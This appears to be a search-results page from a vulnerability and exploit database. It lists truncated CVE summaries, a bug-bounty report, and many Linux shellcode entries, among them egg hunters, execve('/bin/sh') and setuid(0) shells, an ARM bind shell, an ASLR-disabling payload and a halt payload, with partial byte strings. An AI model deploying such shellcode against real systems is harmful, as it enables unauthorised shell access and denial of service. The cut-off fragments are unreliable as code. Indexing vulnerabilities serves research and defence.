3386 matches found
perl -- multiple vulnerabilities
perldelta: CVE-2018-6797: heap-buffer-overflow WRITE of size 1 in Sregatom regcomp.c A crafted regular expression could cause a heap buffer write overflow, with control over the bytes written. perl 132227 CVE-2018-6798: Heap-buffer-overflow in Perlbytedumpstring utf8.c Matching a crafted locale...
Greenhouse.io: Cache poisoning using NULL bytes and long URLs
This is related to a previous report I made https://hackerone.com/reports/326639. The same endpoint https://boards.greenhouse.io/embed/jobboard/js?for= is still vulnerable to arbitrary string injection, by terminating the customer key in the for parameter with a URL-encoded NULL byte i.e. %00,...
CVE-2017-9693
The length of attribute value for STAEXTCAPABILITY in wlanhddchangestation in Android for MSM, Firefox OS for MSM, and QRD Android before 2017-06-06 being less than the actual length of StaParams.extncapability results in a read for extra bytes when a memcpy is done from params-extcapab to...
SysGauge 4.5.18 - Local Denial of Service
SysGauge 4.5.18 - Local Denial of Service !/usr/bin/python Exploit Title : SysGauge v4.5.18 - Local Denial of Service Exploit Author : Hashim Jawad Twitter : @ihack4falafel Author Website : ihack4falafel.com Vendor Homepage : http://www.sysgauge.com/ Vulnerable Software :...
Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)
/ Title: Linux/x86 - EggHunter Shellcode 11 Bytes Author: Anurag Srivastava Tested on: i686 GNU/Linux Shellcode Length: 11 Description: Smallest Null-Free Egg Hunter Shellcode - 11 Bytes Details: 1. Works with an executable EGG 2. Make sure you clear EDX, EAX registers in the shellcode before any...
CVE-2018-7658
NTSServerSvc.exe in the server in Softros Network Time System 2.3.4 allows remote attackers to cause a denial of service (daemon crash) by sending exactly 11 bytes...
Linux/x86 exit(0) Shellcode (5 bytes)
/ Smallest Linux/x86 - exit0 shellcode 5 bytes Author: Anurag Srivastava Tested on: i686 GNU/Linux Shellcode Length: 5 exitchotu: file format elf32-i386 Disassembly of section .text: 08048060 : 8048060: 6a 01 push 0x1 8048062: 58 pop eax 8048063: cd 80 int 0x80 ===============POC by Anurag...
Protobuf-Inspector - Tool To Reverse-Engineer Protocol Buffers With Unknown Definition
Simple program that can parse Google Protobuf encoded blobs version 2 or 3 without knowing their accompanying definition. It will print a nice, colored representation of their contents. Example: As you can see, the field names are obviously lost, together with some high-level details such as:...
AZL-7261 CVE-2004-2779 affecting package libid3tag 0.15.1b-33
id3_utf16_deserialize in utf16.c in libid3tag through 0.15.1b misparses ID3v2 tags encoded in UTF-16 with an odd number of bytes, triggering an endless loop allocating memory until an OOM condition is reached, leading to denial-of-service (DoS)...
PT-2018-4015 · Underbit Technologies +2 · Libid3Tag +2
Name of the Vulnerable Software and Affected Versions: libid3tag versions 0.15.1b and earlier. Description: The issue arises from the id3_utf16_deserialize function in utf16.c, which misparses ID3v2 tags encoded in UTF-16 with an odd number of bytes. This triggers an endless loop that allocates...
Linux/ARM - Bind TCP (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)
Linux/ARM - Bind TCP 4444/TCP Shell /bin/sh + IP Controlled 192.168.1.190 + Null-Free Shellcode 168 bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - IP Controlled Bind Shell TCP /bin/sh. Null free shellcode 168 bytes Date: 2018-02-17 Tested: armv7l Raspberry Pi v3 and armv6l Raspber...
CVE-2018-1052
Removed by vendor...
Linux/x86 - Egghunter Shellcode (12 Bytes)
/ Title: Linux/x86 - EggHunter Shellcode 12 Bytes Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes Date : 14/Jan/2018 Author: Nipun Jaswal @nipunjaswal ; SLAE-1080 Details: 1. Works with an executable EGG 2. Make sure you clear EDX, EAX registers in the shellcode before any other...
Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)
Linux/x86 - Disable ASLR Security + Obfuscated Shellcode 23 bytes. Shellcode exploit for Linuxx86 platform ;Title : Linux/x86 - Disable ASLR Security obfuscated shellcode - 23 bytes ;Date : 24 Jan 2018 ;Author : 0xAlaufi ;Tested on : Linux/x86 Ubuntu 12.04.5 global start section .text start: jmp...
Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)
;Title : Linux/x86 - Disable ASLR Security obfuscated shellcode - 23 bytes ;Date : 24 Jan 2018 ;Author : 0xAlaufi ;Tested on : Linux/x86 Ubuntu 12.04.5 global start section .text start: jmp zero2 zero18: mov al,0x4 jmp zero19 zero1a: mov al,0x6 jmp zero1b zeroc: push 0x72702f2f jmp zerod zero12:...
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)
/ Description ; Title : Polymorphic execve /bin/sh - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell ; OS : Linux ; Arch : x86 ; Size : 26 bytes sh.nasm global start section .text start: ; zero out EA...
Linux/x86 - execve(/bin/sh,0,0) Shellcode (21 bytes)
/ linux/x86 execve"/bin/sh",0,0 21 bytes http://www.gonullyourself.org sToRm / char shellcode = // "\x31\xc9" // xor %ecx,%ecx "\xf7\xe1" // mul %ecx "\x51" // push %ecx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\xb0\x0b" //...
Linux/x86 - setuid(0) + execve("/bin/sh",0,0) Shellcode (28 bytes)
/ linux/x86 setuid0 & execve"/bin/sh",0,0 28 bytes http://www.gonullyourself.org sToRm I made this, because http://www.milw0rm.com/shellcode/7115 felt the need to express his "superior" 28-byte shellcode in all caps. I wasn't able to beat his code, but it's no longer special. / char shellcode = /...
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh,[/bin/sh,NULL])) Shellcode (25 bytes)
include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80 "\xb0\x0b" // mov $0xb,%al So you'll get segfault if it's not able to do the setuid0. If you don't want this you can...
Linux/x86 - execve(/sbin/halt,/sbin/halt) Shellcode (27 bytes)
include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x66\x68\x6c\x74" // pushw $0x746c "\x68\x6e\x2f\x68\x61" // push $0x61682f6e "\x68\x2f\x73\x62\x69" // push $0x6962732f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // push %ebx...